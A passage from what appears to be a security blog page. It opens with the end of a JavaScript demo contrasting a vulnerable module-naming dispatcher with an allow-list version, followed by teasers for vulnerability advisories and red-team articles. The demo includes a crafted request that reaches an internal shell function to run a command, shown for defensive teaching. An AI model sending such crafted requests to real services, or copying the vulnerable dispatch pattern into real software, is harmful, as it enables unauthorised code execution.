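  const { id, args } = parsed;
  if (typeof id !== 'string' || !allowedActions.has(id)) {
    throw new Error('unknown action');
  }
  const { fn, arity } = allowedActions.get(id);
  if (!Array.isArray(args) || args.length !== arity) {
    throw new Error('bad argument list');
  }
  return fn(...args);
}

// Constructed sample requests: one benign and one crafted for each dispatcher.
const benignLegacy = JSON.stringify({ moduleId: 'actions/greet', exportName: 'greet', args: ['world'] });
const craftedLegacy = JSON.stringify({ moduleId: 'internal/shell', exportName: 'runCommand', args: ['id'] });
const benignSafe = JSON.stringify({ id: 'act_greet', args: ['world'] });
const craftedSafe = JSON.stringify({ id: 'internal/shell', args: ['id'] });

// Returns a summary object so the contrast is visible as return values.
function demo() {
  const out = {
    vulnerableBenign: vulnerableDispatch(benignLegacy),
    vulnerableCrafted: vulnerableDispatch(craftedLegacy), // reaches internal code
    safeBenign: safeDispatch(benignSafe),
  };
  try {
    safeDispatch(craftedSafe);
    out.safeCrafted = 'accepted';
  } catch (e) {
    out.safeCrafted = `rejected: ${e.message}`;
  }
  return out;
}

console.log(demo());
```

The point of the hardened version is not the JSON parsing but where the authority lives: the server, not the payload, decides which functions exist, and the request can only select from that fixed set. Any deserializer that lets a client name a module, class or export to instantiate is in the vulnerable shape regardless of the wire format.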

What Will Shape Cybersecurity in 2026: AI Speed, Expanding Attack Surfaces, and Specialized Red Teams

2026 will hit cybersecurity like a fast-forward button: AI moves quicker than governance, attack surfaces sprawl into the physical world, and red teams get hyper-specialized. Here’s what’s coming—and how to stay ahead before “optional” becomes “too late.”

A Vulnerability in SonicOS Could Allow for Denial of Service (DoS)

A vulnerability has been discovered in SonicOS, which could allow for denial of service (DoS). SonicOS is the operating system that runs on SonicWall's network security appliances, such as firewalls. Successful exploitation of this vulnerability could allow a remote, unauthenticated attacker to cause a denial of service that crashes the affected firewall. This vulnerability only affects firewalls on which the SonicOS SSL VPN interface or service is enabled.

Multiple Vulnerabilities in Google Chrome Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Google Chrome, the most severe of which could allow for arbitrary code execution. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution in the context of the logged-on user. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

Fortinet FortiWeb Authentication Bypass – CVE-2025-64446

Bishop Fox researchers discovered an authentication bypass in FortiWeb that lets attackers add their own admin accounts, take over the device, and erase evidence. Organizations can quickly check if they’re exposed using a new Bishop Fox scanner and should remove public access and update immediately.

Multiple Vulnerabilities in Fortinet Products Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Fortinet products, the most severe of which could allow for arbitrary code execution. FortiClient for Windows is a unified endpoint security solution that provides a range of security features, including a VPN client for secure remote access to corporate networks, antivirus protection, web filtering, and vulnerability assessment. FortiExtender is a device from Fortinet that provides secure 5G/LTE and Ethernet connectivity to extend a network's edge. FortiMail is a secure email gateway from Fortinet that protects against email-borne threats like spam, phishing, and malware, and prevents data loss. FortiPAM provides privileged account management, session monitoring and management, and role-based access control to secure access to sensitive assets and mitigate data breaches. FortiSandbox is an advanced threat detection solution from Fortinet that uses sandboxing to analyze suspicious files and network traffic for advanced threats like zero-day malware and ransomware. FortiADC is an application delivery controller (ADC) that improves the availability, performance, and security of web applications. FortiWeb is a web application firewall (WAF) that protects web applications and APIs from attacks like SQL injection and cross-site scripting, while also helping to meet compliance requirements. FortiVoice is a unified communications solution that combines voice, chat, conferencing, and fax into a single, secure platform for businesses and schools. FortiOS is Fortinet's proprietary operating system, used across multiple product lines. FortiProxy is a secure web gateway product from Fortinet that protects users from internet-borne attacks, enforces compliance, and improves network performance. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution in the context of the affected service account. Depending on the privileges associated with the service account, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Service accounts configured with fewer rights on the system could be less impacted than those that run with administrative rights.

A Vulnerability in FortiWeb Could Allow for Remote Code Execution

A vulnerability has been discovered in FortiWeb, which could allow for remote code execution. FortiWeb is a web application firewall (WAF) developed by Fortinet. It is designed to protect web applications and APIs from a wide range of attacks, including those targeting known vulnerabilities and zero-day exploits. Successful exploitation of this vulnerability could allow an attacker to execute administrative commands on the system via crafted HTTP or HTTPS requests.

Multiple Vulnerabilities in Mozilla Products Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Mozilla products, the most severe of which could allow for arbitrary code execution. Mozilla Firefox is a web browser used to access the Internet. Mozilla Firefox ESR is a version of the web browser intended to be deployed in large organizations. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

Critical Patches Issued for Microsoft Products, November 11, 2025

Multiple vulnerabilities have been discovered in Microsoft products, the most severe of which could allow for remote code execution. Successful exploitation of the most severe of these vulnerabilities could result in an attacker gaining the same privileges as the logged-on user. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

Multiple Vulnerabilities in Adobe Products Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Adobe products, the most severe of which could allow for arbitrary code execution. Adobe InDesign is a professional page layout and desktop publishing application used for designing and publishing content for both print and digital media. Adobe InCopy is a professional word processor designed for writers and editors to collaborate with designers on documents simultaneously. Adobe Photoshop is a raster graphics editor for image creation, editing, and manipulation. Adobe Illustrator is a professional vector graphics editor used for creating logos, icons, typography, and other scalable graphics that retain clarity at any size. Adobe Illustrator mobile is a vector graphics app for the iPad that allows users to create and edit illustrations, logos, and graphics on the go. Adobe Pass is a cloud-based service that helps broadcasters, cable networks, and pay-TV providers manage subscriber access to online content, enabling viewers to log in once and watch across multiple devices and websites. Adobe Substance 3D is a suite of tools for creating 3D content, including modeling, texturing, and rendering. Adobe Format Plugins are add-ons for Adobe products that extend functionality, allowing them to read and convert between various file formats. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution in the context of the logged-on user. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

Multiple Vulnerabilities in Google Android OS Could Allow for Remote Code Execution

Multiple vulnerabilities have been discovered in Google Android OS, the most severe of which could allow for remote code execution. Android is an operating system developed by Google for mobile devices, including, but not limited to, smartphones, tablets, and watches. Successful exploitation of the most severe of these vulnerabilities could allow for remote code execution. Depending on the privileges associated with the exploited component, an attacker could then install programs; view, change, or delete data; or create new accounts with full rights.

Multiple Vulnerabilities in Apple Products Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Apple products, the most severe of which could allow for arbitrary code execution. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution in the context of the logged-on user. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

Multiple Vulnerabilities in Cisco Products Could Allow for Remote Code Execution

Multiple vulnerabilities have been discovered in Cisco products, the most severe of which could allow for remote code execution. Cisco is a leading technology company best known for its networking hardware and software, such as routers and switches, that form the backbone of the internet and enterprise networks. Successful exploitation of the most severe of these vulnerabilities could allow for remote code execution as root, which may lead to the complete compromise of the affected device.

Ready to Hack an LLM? Our Top CTF Recommendations

The best way to understand LLM vulnerabilities isn’t by reading, it’s by hacking. Explore our top CTF and sandbox picks to safely test prompt injections, jailbreaks, and model exploits while sharpening your AI security skills.

Small Actions, Big Breaches: The Silent Offensive Against Your Data

AI and SaaS have transformed how people work, but security hasn’t kept up. New data shows most data exposure now stems from human behavior—copy, paste, and upload actions inside unmanaged browsers and AI tools.

SaaS Threats are Escalating: A Follow-Up to Our Recent Analysis

SaaS attacks are accelerating fast. Our latest research and fireside chat with experts from AppOmni and Bishop Fox expose how threat actors are exploiting OAuth, targeting admins, and moving laterally across cloud apps—and what defenders can do to stop them.

State of the SaaS Security Union

Two threat groups are exploiting SaaS at scale: one with phishing and data theft, the other with nation-state level tactics exploiting integrations and credentials. Here’s what you need to know and how to protect against the next wave.

Demystifying 5G Security: Understanding the Registration Protocol

5G networks face critical security gaps during device registration. Despite improved architecture, unprotected initial messages and weak encryption negotiation create attack windows. Learn how to identify and mitigate these vulnerabilities.

Vulnerability Discovery with LLM-Powered Patch Diffing

Read our most recent research to see how LLMs can assist in scaling patch diffing workflows, saving valuable time in a crucial race against attackers.

You’re Pen Testing AI Wrong: Why Prompt Engineering Isn’t Enough

Conventional pen testing methods fall short with LLMs. Static prompt tests miss adversarial context manipulation and latent model behaviors. Explore how to test AI systems like an attacker.

Sitecore Experience Platform Vulnerabilities: Critical Update Needed for Versions 10.1 to 10.3

Critical vulnerabilities in Sitecore Experience Platform versions 10.1–10.3 could allow unauthenticated attackers to gain full system access through a simple exploit chain. Learn what’s at risk—and how to defend against it.

Sipping from the CVE Firehose: How We Prioritize Emerging Threats for Real-World Impact

With tens of thousands of CVEs flooding in each year, how do you spot the ones that actually matter? At Bishop Fox, we’ve built a smarter way to cut through the noise and act fast on real-world threats. Here’s how we prioritize CVEs that truly impact our customers.

2025 Red Team Tools – Cloud & Identity Exploitation, Evasion & Developer Libraries

Explore the next wave of Red Team tools focused on cloud, identity, evasion, and developer libraries—where stealth, creativity, and adaptability matter more than flashy features. Learn how Bishop Fox operators turn techniques into strategic advantage.

2025 Red Team Tools – C2 Frameworks, Active Directory & Network Exploitation

Explore our top Red Team tools for 2025—from powerful C2 frameworks to Active Directory and network exploitation utilities. Built for real-world adversary emulation, this toolkit is your edge in offensive security. Dive into part one of our expert-curated series.

Before You Red Team: Fix These 5 Common Mistakes

Attackers exploit the same 5 mistakes time and again. Red teams spot the patterns; in this blog you will learn how to fix what adversaries count on.

SonicWall SonicOS Versions 7.1.x and 8.0.x

Bishop Fox staff identified a vulnerability in SonicWall SonicOS 7.1.x and 8.0.x that allowed them to cause an affected NSv virtual appliance to reboot by sending unauthenticated requests to specific API endpoints, resulting in a denial-of-service condition.

The Promise and Perils of AI: Navigating Emerging Cyber Threats - A Dark Reading Panel

This video features leading voices in cybersecurity examining how AI is simultaneously transforming cyber defense and supercharging attacker capabilities. Together, they explore how GenAI is reshaping the threat landscape and what security leaders must do to adapt.

Epic Fails and Heist Tales: A Red Teamer’s Journey to Deadwood

Bishop Fox's Alethe Denis recaps and provides key insights from her talk, Epic Fails and Heist Tales: Red Teaming Toward Truly Tested Security, at Wild West Hackin' Fest.
